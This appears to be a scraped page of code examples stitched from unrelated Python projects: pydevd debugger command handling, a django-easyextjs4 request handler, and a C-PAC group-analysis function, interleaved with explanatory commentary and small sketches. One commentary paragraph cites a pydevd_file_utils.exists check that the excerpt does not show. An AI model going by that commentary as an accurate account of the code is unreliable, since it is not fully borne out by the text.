                        dict_pop(cp, exception, None)
                        py_db.break_on_caught_exceptions = cp
                    except:
                        pydev_log.debug("Error while removing exception %s"%sys.exc_info()[0])
                    update_exception_hook(py_db)
                else:
                    supported_type = False

                    # I.e.: no need to initialize lazy (if we didn't have it in the first place, we can't remove
                    # anything from it anyways).
                    plugin = py_db.plugin
                    if plugin is not None:
                        supported_type = plugin.remove_exception_breakpoint(py_db, exception_type, exception)

                    if supported_type:
                        py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()
                    else:
                        raise NameError(exception_type)

            elif cmd_id == CMD_LOAD_SOURCE:
                path = text
                try:
                    f = open(path, 'r')
                    source = f.read()
                    py_db.cmd_factory.make_load_source_message(seq, source, py_db)
                except:
                    return py_db.cmd_factory.make_error_message(seq, pydevd_tracing.get_exception_traceback_str())

            elif cmd_id == CMD_ADD_DJANGO_EXCEPTION_BREAK:
                exception = text
                plugin = py_db.get_plugin_lazy_init()
                if plugin is not None:
                    plugin.add_breakpoint('add_exception_breakpoint', py_db, 'django', exception)
                    py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()


            elif cmd_id == CMD_REMOVE_DJANGO_EXCEPTION_BREAK:
                exception = text

                # I.e.: no need to initialize lazy (if we didn't have it in the first place, we can't remove
                # anything from it anyways).
                plugin = py_db.plugin
                if plugin is not None:
                    plugin.remove_exception_breakpoint(py_db, 'django', exception)
                    py_db.has_plugin_exception_breaks = py_db.plugin.has_exception_breaks()

            elif cmd_id == CMD_EVALUATE_CONSOLE_EXPRESSION:
                # Command which takes care for the debug console communication
                if text != "":
                    thread_id, frame_id, console_command = text.split('\t', 2)
                    console_command, line = console_command.split('\t')

                    if console_command == 'EVALUATE':
                        int_cmd = InternalEvaluateConsoleExpression(
                            seq, thread_id, frame_id, line, buffer_output=True)

                    elif console_command == 'EVALUATE_UNBUFFERED':
                        int_cmd = InternalEvaluateConsoleExpression(
                            seq, thread_id, frame_id, line, buffer_output=False)

                    elif console_command == 'GET_COMPLETIONS':
                        int_cmd = InternalConsoleGetCompletions(seq, thread_id, frame_id, line)

                    else:
                        raise ValueError('Unrecognized command: %s' % (console_command,))

                    py_db.post_internal_command(int_cmd, thread_id)

            elif cmd_id == CMD_RUN_CUSTOM_OPERATION:
                # Command which runs a custom operation
                if text != "":
                    try:
                        location, custom = text.split('||', 1)
                    except:
                        sys.stderr.write('Custom operation now needs a || separator. Found: %s\n' % (text,))
                        raise

                    thread_id, frame_id, scopeattrs = location.split('\t', 2)

                    if scopeattrs.find('\t') != -1:  # there are attributes beyond scope
                        scope, attrs = scopeattrs.split('\t', 1)
                    else:
                        scope, attrs = (scopeattrs, None)

                    # : style: EXECFILE or EXEC
                    # : encoded_code_or_file: file to execute or code
                    # : fname: name of function to be executed in the resulting namespace
                    style, encoded_code_or_file, fnname = custom.split('\t', 3)
                    int_cmd = InternalRunCustomOperation(seq, thread_id, frame_id, scope, attrs,
                                                         style, encoded_code_or_file, fnname)
                    py_db.post_internal_command(int_cmd, thread_id)

            elif cmd_id == CMD_IGNORE_THROWN_EXCEPTION_AT:
                if text:
                    replace = 'REPLACE:'  # Not all 3.x versions support u'REPLACE:', so, doing workaround.
                    if not IS_PY3K:
                        replace = unicode(replace)

                    if text.startswith(replace):
                        text = text[8:]
                        py_db.filename_to_lines_where_exceptions_are_ignored.clear()

                    if text:
                        for line in text.split('||'):  # Can be bulk-created (one in each line)
                            filename, line_number = line.split('|')
                            if not IS_PY3K:
                                filename = filename.encode(file_system_encoding)

                            filename = pydevd_file_utils.norm_file_to_server(filename)

                            if os.path.exists(filename):
                                lines_ignored = py_db.filename_to_lines_where_exceptions_are_ignored.get(filename)
                                if lines_ignored is None:
                                    lines_ignored = py_db.filename_to_lines_where_exceptions_are_ignored[filename] = {}
                                lines_ignored[int(line_number)] = 1
                            else:
                                sys.stderr.write('pydev debugger: warning: trying to ignore exception thrown'\
                                    ' on file that does not exist: %s (will have no effect)\n' % (filename,))

            elif cmd_id == CMD_ENABLE_DONT_TRACE:
                if text:
                    true_str = 'true'  # Not all 3.x versions support u'str', so, doing workaround.
                    if not IS_PY3K:
                        true_str = unicode(true_str)

                    mode = text.strip() == true_str
                    pydevd_dont_trace.trace_filter(mode)

            else:
                #I have no idea what this is all about
                cmd = py_db.cmd_factory.make_error_message(seq, "unexpected command " + str(cmd_id))

            if cmd is not None:
                py_db.writer.add_command(cmd)
                del cmd

        except Exception:
            traceback.print_exc()
            from _pydev_bundle.pydev_imports import StringIO
            stream = StringIO()
            traceback.print_exc(file=stream)
            cmd = py_db.cmd_factory.make_error_message(
                seq,
                "Unexpected exception in process_net_command.\nInitial params: %s. Exception: %s" % (
                    ((cmd_id, seq, text), stream.getvalue())
                )
            )

            py_db.writer.add_command(cmd)
    finally:
        py_db._main_lock.release()
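
In the pydevd excerpt above, the existence checks (pydevd_file_utils.exists and os.path.exists) are used defensively: when a breakpoint or ignore-exception target refers to a file that does not exist, the debugger only prints a warning and keeps going, and file contents are read only after the check passes. Below is a minimal standalone sketch of that warn-but-continue pattern; BreakpointRegistry, add_breakpoint and normalize_path are illustrative names and are not part of pydevd.

import os
import sys


def normalize_path(path):
    # Stand-in for pydevd_file_utils.norm_file_to_server: normalize the
    # client-supplied path so later lookups use a consistent key.
    return os.path.normcase(os.path.abspath(path))


class BreakpointRegistry(object):

    def __init__(self):
        self.file_to_lines = {}

    def add_breakpoint(self, filename, line):
        filename = normalize_path(filename)
        if not os.path.exists(filename):
            # Warn but keep going, as the debugger above does: the file may
            # not exist yet (generated code, wrong path mapping), so the
            # breakpoint is still registered and simply has no effect.
            sys.stderr.write('warning: breakpoint added to file that does '
                             'not exist: %s (will have no effect)\n' % (filename,))
        self.file_to_lines.setdefault(filename, set()).add(line)
        return filename


if __name__ == '__main__':
    registry = BreakpointRegistry()
    registry.add_breakpoint(__file__, 10)             # existing file, no warning
    registry.add_breakpoint('no_such_module.py', 3)   # warns, but is still stored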

Example 107

Project: django-easyextjs4
Source File: __init__.py
View license
    @staticmethod
    def Request(pRequest, pRootProject = None, pRootUrl = None, pIndex = 'index.html', pAlias = None):
        lRet = HttpResponse(status = 400, content = '<h1>HTTP 400 - Bad Request</h1>The request cannot be fulfilled due to bad syntax.')

        # Remove http://<host name>:<port>/ from pRootUrl
        pRootUrl = urlparse(pRootUrl).path

        # Validate the URL.
        lPath = urlparse(pRequest.path).path
        lMatch = re.match('^/[0-9a-zA-Z\.\/\-\_]*$', lPath) 
    
        if lMatch is None:
            raise ExtJSError('You have some invalid characters on the Url: "%s"' % pRootUrl)
    
        if pRootUrl is not None:
            # If a URL root is specified, check that the URL begins with this path
            if lPath.find(pRootUrl) != 0:
                raise ExtJSError('Invalid root for the Url: "%s"' % pRootUrl)
            # Remove url root from the path
            lPath = lPath[len(pRootUrl):]
        else:
            # If no URL root is specified, do not validate it
            pRootUrl = ''
    
        # Detect whether the URL is a request for the javascript wrapper
        lUrlApis = re.search('^(\w*\.js)$', lPath)
        
        if lUrlApis is not None:
            lUrlApi = lUrlApis.group(1)
            
            if lUrlApi in Ext.__URLSAPI:
                # URL found => Generate javascript wrapper
                lRemoteAPI = dict()
                for lClass in Ext.__URLSAPI[lUrlApi]:
                    lExt = lClass.__ExtJS
                    
                    if lExt.Url not in lRemoteAPI:
                        # Collect all class with the same Url
                        lRemoteAPI[lExt.Url] = dict()
                        lCurrent = lRemoteAPI[lExt.Url]
                        if 'format' in pRequest.REQUEST and pRequest.REQUEST['format'] == 'json':
                            # 'descriptor' is needed for Sencha Architect to recognize your API
                            lCurrent['descriptor'] = lClass.__name__ + '.REMOTING_API'
                            if lExt.NameSpace is not None:
                                 lCurrent['descriptor'] = lExt.NameSpace + '.' + lCurrent['descriptor']
                        lCurrent['url'] = lExt.Url
                        lCurrent['type'] = 'remoting'
                        if lExt.Id is not None:
                            lCurrent['id'] = lExt.Id
                        if lExt.NameSpace is not None:
                            lCurrent['namespace'] = lExt.NameSpace
                        lCurrent['actions'] = dict()
                        lAction = lCurrent['actions']
                    
                    if len(lExt.StaticMethods) > 0:
                        # Define a class as an Action with a list of functions
                        lRemoteMethods = list()
                        for lMethod in lExt.StaticMethods:
                            lMethodInfo = lExt.StaticMethods[lMethod]
                            if not lMethodInfo.NameParams:
                                lMethodExt = dict(name = lMethod, len = len(lMethodInfo.Args))
                            else:
                                # Typed parameters are not supported on python 2.7 or lower.
                                if sys.version_info < (3, 0):
                                    lMethodExt = dict(name = lMethod, params = lMethodInfo.Args)
                                else:
                                    if not lMethodInfo.TypeParams:
                                        lMethodExt = dict(name = lMethod, params = lMethodInfo.Args)
                                    else:
                                        # TODO: support this feature for python 3.x
                                        # Must return something like this :
                                        #    "params": [{
                                        #    "name": "path",
                                        #    "type": "string",
                                        #    "pos": 0
                                        #    },
                                        raise ExtJSError('Type for parameters not supported yet')
                            lRemoteMethods.append(lMethodExt)
                        # Each class is defined as an 'Action'
                        lAction[lClass.__name__] = lRemoteMethods
                    for lKey in lExt.StaticEvents:
                        # Each event is defined as a Provider for ExtJS, even if it shares the same namespace.
                        lEvent = lExt.StaticEvents[lKey]
                        lRemote = dict()
                        lRemote['url'] = lEvent.Url
                        lRemote['type'] = 'polling'
                        if lEvent.Id is not None:
                            lRemote['id'] = lEvent.Id
                        if lEvent.NameSpace is not None:
                            lRemote['namespace'] = lEvent.NameSpace
                        if lEvent.Params is not None:
                            lRemote['baseParams'] = lEvent.Params
                        if lEvent.Interval is not None:
                            lRemote['interval'] = lEvent.Interval
                        lRemoteAPI[lEvent.Url] = lRemote

                if len(lRemoteAPI) > 0:    
                    lJsonRemoteAPI = json.dumps(lRemoteAPI.values(),default=ExtJsonHandler)
                    
                    lNameSpace = lClass.__name__
                    if lExt.NameSpace is not None:
                        lNameSpace = lExt.NameSpace + '.' + lNameSpace
                    
                    if 'format' in pRequest.REQUEST and pRequest.REQUEST['format'] == 'json':
                        # Define JSON format for Sencha Architect
                        lContent = 'Ext.require(\'Ext.direct.*\');Ext.namespace(\''+ lNameSpace +'\');'+ lNameSpace + '.REMOTING_API = ' + lJsonRemoteAPI[1:len(lJsonRemoteAPI)-1] + ';'
                    else:
                        # Otherwise a javascript file is returned. Each script must be included in index.html like this:
                        # <script type="text/javascript" src="api.js"></script>
                        # Your API is then declared to ExtJS automatically and available in your app.js.
                        lContent = 'Ext.require(\'Ext.direct.*\');Ext.namespace(\''+ lNameSpace +'\');Ext.onReady( function() { Ext.direct.Manager.addProvider(' + lJsonRemoteAPI[1:len(lJsonRemoteAPI)-1] + ');});'
                    lRet = HttpResponse(content = lContent, mimetype='application/javascript')
        else:
            # Detect whether the URL is an RPC or a Poll request
            lUrlRPCsorPolls = re.search('^(\w*)$', lPath)
        
            if lUrlRPCsorPolls is not None:
                lUrl = lUrlRPCsorPolls.group(1)
                
                if lUrl in Ext.__URLSRPC:
                    
                    # URL recognized as an RPC
                    
                    # Extract the data from the raw POST body. We cannot trust pRequest.POST
                    lReceiveRPCs = json.loads(pRequest.body)
                    
                    # Force to be a list of dict
                    if type(lReceiveRPCs) == dict:
                        lReceiveRPCs = [lReceiveRPCs]
                    
                    # Extract URL 
                    lClassesForUrl = Ext.__URLSRPC[lUrl]

                    # Initialize content
                    lContent = list()

                    for lReceiveRPC in lReceiveRPCs:
                        # Execute each RPC request
                        
                        lRcvClass = lReceiveRPC['action']
                        lRcvMethod = lReceiveRPC['method']

                        # Build the API name
                        lMethodName = lRcvClass + '.' + lRcvMethod
                            
                        # Prepare answer
                        lAnswerRPC = dict(type = 'rpc', tid = lReceiveRPC['tid'], action = lRcvClass, method = lRcvMethod)
                        
                        # Prepare exception
                        lExceptionData = dict(Url = lUrl, Type = 'rpc', Tid = lReceiveRPC['tid'], Name = lMethodName )
                        lException = dict(type = 'exception', data = lExceptionData, message = None)
                        
                        if lRcvClass in lClassesForUrl:
                            
                            # Class handling this RPC URL found
                            lClass = lClassesForUrl[lRcvClass]
                            lExt = lClass.__ExtJS
                            
                            if lRcvMethod in lExt.StaticMethods:
                                
                                # Method found
                                lMethod = lExt.StaticMethods[lRcvMethod]
                                
                                # Name used for exception message
                                if lExt.NameSpace is not None:
                                    lMethodName = lExt.NameSpace + '.' + lMethodName 

                                # Add the Id if it is defined
                                if lExt.Id is not None:
                                    lExceptionData['Id'] = lExt.Id
                                
                                # Extract the data
                                lArgs = lReceiveRPC['data']
                                
                                # Validate the parameters and call the method
                                if lArgs is None:
                                    if len(lMethod.Args) != 0:
                                        lException['message'] = '%s numbers of parameters invalid' % lMethodName
                                    else:
                                        try:
                                            # Call method with no parameter
                                            if lMethod.Session is None:
                                                lRetMethod = lMethod.Call()
                                            else:
                                                lRetMethod = lMethod.Call(pSession = lMethod.Session(pRequest))
                                            if lRetMethod is not None:
                                                lAnswerRPC['result'] = lRetMethod
                                        except Exception as lErr:
                                            lException['message'] = '%s: %s' % (lMethodName, str(lErr)) 
                                elif type(lArgs) == list:
                                    if len(lArgs) > len(lMethod.Args):
                                        lException['message'] = '%s numbers of parameters invalid' % lMethodName
                                    else:
                                        try:
                                            # Call method with list of parameters  
                                            if lMethod.Session is None:
                                                lRetMethod = lMethod.Call(*lArgs)
                                            else:
                                                lArgs.insert(0,lMethod.Session(pRequest))
                                                lRetMethod = lMethod.Call(*lArgs)
                                            if lRetMethod is not None:
                                                lAnswerRPC['result'] = lRetMethod
                                        except Exception as lErr:
                                            lException['message'] = '%s: %s' % (lMethodName, str(lErr)) 
                                elif type(lArgs) == dict:
                                    if not lMethod.NameParams:
                                        lException['message'] = '%s does not support named parameters' % lMethodName
                                    else: 
                                        if len(lArgs.keys()) > len(lMethod.Args):
                                            lException['message'] = '%s numbers of parameters invalid' % lMethodName
                                        else:
                                            lInvalidParam = list()
                                            for lParam in lArgs:
                                                if lParam not in lMethod.Args:
                                                     lInvalidParam.append(lParam)
                                            if len(lInvalidParam) > 0:
                                                lException['message'] = '%s: Parameters unknown -> %s' % (lMethodName, ",".join(lInvalidParam))
                                            else:
                                                try:
                                                    # Call method with naming parameters
                                                    if lMethod.Session is None:
                                                        lRetMethod = lMethod.Call(**lArgs)
                                                    else:
                                                        lArgs['pSession'] = lMethod.Session(pRequest)
                                                        lRetMethod = lMethod.Call(**lArgs)
                                                    if lRetMethod is not None:
                                                        lAnswerRPC['result'] = lRetMethod
                                                except Exception as lErr:
                                                    lException['message'] = '%s: %s' % (lMethodName, str(lErr))
                            else:
                                lException['message'] = '%s: API not found' % lMethodName
                                
                        else:
                            lException['message'] = '%s: API not found' % lMethodName
                                
                        if lException['message'] is not None:
                            lContent.append(lException)    
                        else:
                            lContent.append(lAnswerRPC)
                            
                    if len(lContent) > 0:
                        if len(lContent) == 1:
                            lRet = HttpResponse(content = json.dumps(lContent[0],default=ExtJsonHandler), mimetype='application/json')
                        else:
                            lRet = HttpResponse(content = json.dumps(lContent,default=ExtJsonHandler), mimetype='application/json')
                                
                elif lUrl in Ext.__URLSEVT:

                    # URL recognized as a Poll request. A poll request is handled by an Ext.StaticEvent.
                    
                    lClass = Ext.__URLSEVT[lUrl]
                    lExt = lClass.__ExtJS
                    
                    lEvent = lExt.StaticEvents[lUrl]
                    
                    # Define the name of the event that will be fired on ExtJS
                    if lEvent.EventName is not None:
                        # Use the one specified with the @Ext.StaticEvent parameter pEventName
                        lEventName = lEvent.Name
                    else: 
                        # This name is built by concatenating the namespace, the class name and the event name
                        lEventName = lEvent.Name
                        
                        if len(lEvent.ClassName) != 0:
                            lEventName = lEvent.ClassName + '.' + lEvent.Name
                        
                        if len(lEvent.NameSpace) != 0:
                            lEventName = lEvent.NameSpace + '.' + lEventName
                        
                    # Prepare event answer
                    lAnswerEvent = dict(type = 'event', name = lEventName, data = None)
                    
                    # Prepare exception 
                    #  The exception data has the same structure as for a method, except there is no Tid information; it is set to -1.
                    lExceptionData = dict(Url = lUrl, Type = 'event', Tid = -1, Name = lEventName )
                    lException = dict(type = 'exception', data = lExceptionData, message = None)
                    
                    # Add the Id if it is defined. With the id, your javascript code can do something like this:
                    # Ext.direct.Manager.on('exception', function(e) {
                    # if (e.data.Type == 'event') 
                    #    {
                    #      lPoll = Ext.direct.Manager.getProvider(e.data.Id);
                    #       lPoll.disconnect();
                    #    }        
                    # }
                    if lEvent.Id is not None:
                        lAnswerEvent['Id'] = lEvent.Id
                        lExceptionData['Id'] = lEvent.Id
                    
                    # Extract the parameters. For an event, the parameters are in the POST.
                    # If a key has no value, we received a simple list of parameters directly under the key.
                    # If a key has a value, we have named parameters.
                    lArgs = None
                    for lKey in pRequest.POST:
                        if pRequest.POST[lKey] == '':
                            if lArgs is None:
                                lArgs = list()
                            lArgs.extend(lKey.split(','))
                        else:
                            if lArgs is None:
                                lArgs = dict()
                            lArgs[lKey] = pRequest.POST[lKey] 
                    
                    # Validate the parameters and call the event
                    if lArgs is None:
                        if len(lEvent.Args) != 0:
                            lException['message'] = '%s numbers of parameters invalid' % lEventName
                        else:
                            try:
                                # Call event with no parameter
                                if lEvent.Session is None:
                                    lRetEvt = lEvent.Call()
                                else:
                                    lRetEvt = lEvent.Call(pSession = lEvent.Session(pRequest))
                                if lRetEvt is not None:
                                    lAnswerEvent['data'] = lRetEvt
                            except Exception as lErr:
                                lException['message'] = '%s: %s' % (lEventName, str(lErr)) 
                    elif type(lArgs) == list:
                        if len(lArgs) > len(lEvent.Args):
                            lException['message'] = '%s numbers of parameters invalid' % lEventName
                        else:
                            try:
                                # Call event with list of parameters  
                                if lEvent.Session is None:
                                    lRetEvt = lEvent.Call(*lArgs)
                                else:
                                    lArgs.insert(0,lEvent.Session(pRequest))
                                    lRetEvt = lEvent.Call(*lArgs)
                                if lRetEvt is not None:
                                    lAnswerEvent['data'] = lRetEvt
                            except Exception as lErr:
                                lException['message'] = '%s: %s' % (lEventName, str(lErr)) 
                    elif type(lArgs) == dict:
                        if len(lArgs.keys()) > len(lEvent.Args):
                            lException['message'] = '%s numbers of parameters invalid' % lEventName
                        else:
                            lInvalidParam = list()
                            for lParam in lArgs:
                                if lParam not in lEvent.Args:
                                     lInvalidParam.append(lParam)
                            if len(lInvalidParam) > 0:
                                lException['message'] = '%s: Parameters unknown -> %s' % (lEventName, ",".join(lInvalidParam))
                            else:
                                try:
                                    # Call event with naming parameters
                                    if lEvent.Session is None:
                                        lRetEvt = lEvent.Call(**lArgs)
                                    else:
                                        lArgs['pSession'] = lEvent.Session(pRequest)
                                        lRetEvt = lEvent.Call(**lArgs)
                                    if lRetEvt is not None:
                                        lAnswerEvent['data'] = lRetEvt
                                except Exception as lErr:
                                    lException['message'] = '%s: %s' % (lEventName, str(lErr)) 
                                
                    if lException['message'] is not None:
                        lContent = lException    
                    else:
                        lContent = lAnswerEvent
                    
                    lRet = HttpResponse(content = json.dumps(lContent,default=ExtJsonHandler), mimetype='application/json')
    
        if lRet.status_code != 200:
            # The URL is not a request for the API, an RPC or an event; it is just a request for a file
            if pRootProject is not None:
                if not os.path.exists(pRootProject):
                    raise ExtJSError('Invalid root for the project: "%s"' % pRootProject)
            else:
                # If the project root is not specified, use the current folder
                pRootProject = os.getcwd()
        
            # If the path is empty, try to find and load index.html (or the file specified with pIndex)
            if len(lPath) == 0:
                lPath = pIndex
    
            # Rebuild the path to validate it
            lPath = os.path.normpath("/".join([pRootProject,lPath]))
            lFileName, lFileExt = os.path.splitext(lPath)
           
            # Check that the path exists and the extension is valid
            if not os.path.exists(lPath):
                raise ExtJSError('File not found: "%s"' % lPath)
            else:
                if lFileExt not in ['.html','.css','.js','.png','.jpg','.gif','.json','.xml']:
                    raise ExtJSError('File extension is invalid: "%s"' % lFileExt)
                else:
                    try:
                        lMime = mimetypes.types_map[lFileExt]
                    except Exception as lException:
                        if isinstance(lException,KeyError) and lFileExt == '.json':
                            lMime = 'text/json'
                        else:
                            raise lException
                    # TODO: Manage a cache file
                    lFile = open(lPath)
                    lContent = lFile.read()
                    lFile.close()
                    lRet = HttpResponse(content = lContent, mimetype = lMime)
              
        return lRet
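
The end of Request() above only serves a file once three checks pass: the project root exists (falling back to os.getcwd() when none is given), the rebuilt path exists, and the extension is on a small whitelist. A compact standalone sketch of that guard is shown below; serve_static and ALLOWED_EXTENSIONS are illustrative names, not part of django-easyextjs4, and the HttpResponse wrapping is left out.

import mimetypes
import os

ALLOWED_EXTENSIONS = ['.html', '.css', '.js', '.png', '.jpg', '.gif', '.json', '.xml']


def serve_static(root_project, rel_path, index='index.html'):
    # Fall back to the current folder when no project root is given.
    if root_project is None:
        root_project = os.getcwd()
    elif not os.path.exists(root_project):
        raise ValueError('Invalid root for the project: "%s"' % root_project)

    # An empty path means "serve the index file".
    if not rel_path:
        rel_path = index

    # Rebuild and normalize the path before validating it.
    path = os.path.normpath(os.path.join(root_project, rel_path))
    ext = os.path.splitext(path)[1]

    if not os.path.exists(path):
        raise ValueError('File not found: "%s"' % path)
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError('File extension is invalid: "%s"' % ext)

    # '.json' is missing from mimetypes.types_map on some Python versions,
    # which is why the original code special-cases it.
    mime = mimetypes.types_map.get(ext, 'text/json')

    with open(path, 'rb') as handle:
        return handle.read(), mime


if __name__ == '__main__':
    # Quick demo: write a small file in the current folder and serve it.
    with open('demo.html', 'w') as handle:
        handle.write('<h1>hello</h1>')
    content, mime = serve_static(None, 'demo.html')
    print('%s (%d bytes)' % (mime, len(content)))
    os.remove('demo.html')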

Example 108

Project: C-PAC
Source File: cpac_ga_model_generator.py
View license
def prep_group_analysis_workflow(model_df, pipeline_config_path, \
    model_name, group_config_path, resource_id, preproc_strat, \
    series_or_repeated_label):
    
    #
    # this function runs once per derivative type and preproc strat combo
    # during group analysis
    #

    import os
    import patsy
    import numpy as np

    import nipype.pipeline.engine as pe
    import nipype.interfaces.utility as util
    import nipype.interfaces.io as nio

    from CPAC.pipeline.cpac_group_runner import load_config_yml
    from CPAC.utils.create_flame_model_files import create_flame_model_files
    from CPAC.utils.create_group_analysis_info_files import write_design_matrix_csv

    pipeline_config_obj = load_config_yml(pipeline_config_path)
    group_config_obj = load_config_yml(group_config_path)

    pipeline_ID = pipeline_config_obj.pipelineName

    # remove file names from preproc_strat
    filename = preproc_strat.split("/")[-1]
    preproc_strat = preproc_strat.replace(filename,"")
    preproc_strat = preproc_strat.lstrip("/").rstrip("/")

    # get thresholds
    z_threshold = float(group_config_obj.z_threshold[0])

    p_threshold = float(group_config_obj.p_threshold[0])

    sub_id_label = group_config_obj.participant_id_label

    ftest_list = []
    readme_flags = []

    # determine if f-tests are included or not
    custom_confile = group_config_obj.custom_contrasts

    if ((custom_confile == None) or (custom_confile == '') or \
            ("None" in custom_confile) or ("none" in custom_confile)):

        custom_confile = None

        if (group_config_obj.f_tests is None) or \
            (len(group_config_obj.f_tests) == 0):
            fTest = False
        else:
            fTest = True
            ftest_list = group_config_obj.f_tests

    else:

        if not os.path.exists(custom_confile):
            errmsg = "\n[!] CPAC says: You've specified a custom contrasts " \
                     ".CSV file for your group model, but this file cannot " \
                     "be found. Please double-check the filepath you have " \
                     "entered.\n\nFilepath: %s\n\n" % custom_confile
            raise Exception(errmsg)

        with open(custom_confile,"r") as f:
            evs = f.readline()

        evs = evs.rstrip('\r\n').split(',')
        count_ftests = 0

        fTest = False

        for ev in evs:
            if "f_test" in ev:
                count_ftests += 1

        if count_ftests > 0:
            fTest = True


    # create path for output directory
    out_dir = os.path.join(group_config_obj.output_dir, \
        "group_analysis_results_%s" % pipeline_ID, \
        "group_model_%s" % model_name, resource_id, \
        series_or_repeated_label, preproc_strat)

    if 'sca_roi' in resource_id:
        out_dir = os.path.join(out_dir, \
            re.search('sca_roi_(\d)+',os.path.splitext(\
                os.path.splitext(os.path.basename(\
                    model_df["Filepath"][0]))[0])[0]).group(0))
            
    if 'dr_tempreg_maps_zstat_files_to_standard_smooth' in resource_id:
        out_dir = os.path.join(out_dir, \
            re.search('temp_reg_map_z_(\d)+',os.path.splitext(\
                os.path.splitext(os.path.basename(\
                    model_df["Filepath"][0]))[0])[0]).group(0))
            
    if 'centrality' in resource_id:
        names = ['degree_centrality_binarize', 'degree_centrality_weighted', \
                 'eigenvector_centrality_binarize', \
                 'eigenvector_centrality_weighted', \
                 'lfcd_binarize', 'lfcd_weighted']

        for name in names:
            if name in filename:
                out_dir = os.path.join(out_dir, name)
                break

    if 'tempreg_maps' in resource_id:
        out_dir = os.path.join(out_dir, re.search('\w*[#]*\d+', \
            os.path.splitext(os.path.splitext(os.path.basename(\
                model_df["Filepath"][0]))[0])[0]).group(0))

    model_path = os.path.join(out_dir, 'model_files')

    second_half_out = \
        out_dir.split("group_analysis_results_%s" % pipeline_ID)[1]

    # generate working directory for this output's group analysis run
    work_dir = os.path.join(pipeline_config_obj.workingDirectory, \
        "group_analysis", second_half_out.lstrip("/"))

    log_dir = os.path.join(pipeline_config_obj.logDirectory, \
        "group_analysis", second_half_out.lstrip("/"))

    # create the actual directories
    create_dir(model_path, "group analysis output")
    create_dir(work_dir, "group analysis working")
    create_dir(log_dir, "group analysis logfile")


    # create new subject list based on which subjects are left after checking
    # for missing outputs
    new_participant_list = []
    for part in list(model_df["Participant"]):
        # do this instead of using "set" just in case, to preserve order
        #   only reason there may be duplicates is because of multiple-series
        #   repeated measures runs
        if part not in new_participant_list:
            new_participant_list.append(part)

    new_sub_file = write_new_sub_file(model_path, \
                                      group_config_obj.participant_list, \
                                      new_participant_list)

    group_config_obj.update('participant_list',new_sub_file)

    num_subjects = len(list(model_df["Participant"]))


    # start processing the dataframe further
    design_formula = group_config_obj.design_formula

    # demean EVs set for demeaning
    for demean_EV in group_config_obj.ev_selections["demean"]:
        model_df[demean_EV] = model_df[demean_EV].astype(float)
        model_df[demean_EV] = model_df[demean_EV].sub(model_df[demean_EV].mean())

    # demean the motion params
    if ("MeanFD" in design_formula) or ("MeanDVARS" in design_formula):
        params = ["MeanFD_Power", "MeanFD_Jenkinson", "MeanDVARS"]
        for param in params:
            model_df[param] = model_df[param].astype(float)
            model_df[param] = model_df[param].sub(model_df[param].mean())


    # create 4D merged copefile, in the correct order, identical to design
    # matrix
    merge_outfile = model_name + "_" + resource_id + "_merged.nii.gz"
    merge_outfile = os.path.join(model_path, merge_outfile)

    merge_file = create_merged_copefile(list(model_df["Filepath"]), \
                                        merge_outfile)

    # create merged group mask
    merge_mask_outfile = model_name + "_" + resource_id + \
                             "_merged_mask.nii.gz"
    merge_mask_outfile = os.path.join(model_path, merge_mask_outfile)
    merge_mask = create_merge_mask(merge_file, merge_mask_outfile)

    if "Group Mask" in group_config_obj.mean_mask:
        mask_for_means = merge_mask
    else:
        individual_masks_dir = os.path.join(model_path, "individual_masks")
        create_dir(individual_masks_dir, "individual masks")
        for unique_id, series_id, raw_filepath in zip(model_df["Participant"],
            model_df["Series"], model_df["Raw_Filepath"]):
            
            mask_for_means_path = os.path.join(individual_masks_dir,
                "%s_%s_%s_mask.nii.gz" % (unique_id, series_id, resource_id))
            mask_for_means = create_merge_mask(raw_filepath, 
                                               mask_for_means_path)
        readme_flags.append("individual_masks")

    # calculate measure means, and demean
    if "Measure_Mean" in design_formula:
        model_df = calculate_measure_mean_in_df(model_df, mask_for_means)

    # calculate custom ROIs, and demean (in workflow?)
    if "Custom_ROI_Mean" in design_formula:

        custom_roi_mask = group_config_obj.custom_roi_mask

        if (custom_roi_mask == None) or (custom_roi_mask == "None") or \
            (custom_roi_mask == "none") or (custom_roi_mask == ""):
            err = "\n\n[!] You included 'Custom_ROI_Mean' in your design " \
                  "formula, but you didn't supply a custom ROI mask file." \
                  "\n\nDesign formula: %s\n\n" % design_formula
            raise Exception(err)

        # make sure the custom ROI mask file is the same resolution as the
        # output files - if not, resample and warn the user
        roi_mask = check_mask_file_resolution(list(model_df["Raw_Filepath"])[0], \
                                              custom_roi_mask, mask_for_means, \
                                              model_path, resource_id)

        # trim the custom ROI mask to be within mask constraints
        output_mask = os.path.join(model_path, "masked_%s" \
                                   % os.path.basename(roi_mask))
        roi_mask = trim_mask(roi_mask, mask_for_means, output_mask)
        readme_flags.append("custom_roi_mask_trimmed")

        # calculate
        model_df = calculate_custom_roi_mean_in_df(model_df, roi_mask)

        # update the design formula
        new_design_substring = ""
        for col in model_df.columns:
            if "Custom_ROI_Mean_" in str(col):
                if str(col) == "Custom_ROI_Mean_1":
                    new_design_substring = new_design_substring + " %s" % col
                else:
                    new_design_substring = new_design_substring +" + %s" % col
        design_formula = design_formula.replace("Custom_ROI_Mean", \
                                                new_design_substring)


    cat_list = []
    if "categorical" in group_config_obj.ev_selections.keys():
        cat_list = group_config_obj.ev_selections["categorical"]


    # prep design for repeated measures, if applicable
    if len(group_config_obj.sessions_list) > 0:
        design_formula = design_formula + " + Session"
        if "Session" not in cat_list:
            cat_list.append("Session")
    if len(group_config_obj.series_list) > 0:
        design_formula = design_formula + " + Series"
        if "Series" not in cat_list:
            cat_list.append("Series")
    for col in list(model_df.columns):
        if "participant_" in col:
            design_formula = design_formula + " + %s" % col
            cat_list.append(col)


    # parse out the EVs in the design formula at this point in time
    #   this is essentially a list of the EVs that are to be included
    ev_list = parse_out_covariates(design_formula)


    # SPLIT GROUPS here.
    #   CURRENT PROBLEMS: was creating a few doubled-up new columns
    grp_vector = [1] * num_subjects

    if group_config_obj.group_sep:

        # model group variances separately
        old_ev_list = ev_list

        model_df, grp_vector, ev_list, cat_list = split_groups(model_df, \
                                group_config_obj.grouping_var, \
                                ev_list, cat_list)

        # make the grouping variable categorical for Patsy (if we try to
        # do this automatically below, it will categorical-ize all of 
        # the substrings too)
        design_formula = design_formula.replace(group_config_obj.grouping_var, \
                                  "C(" + group_config_obj.grouping_var + ")")
        if group_config_obj.coding_scheme == "Sum":
            design_formula = design_formula.replace(")", ", Sum)")

        # update design formula
        rename = {}
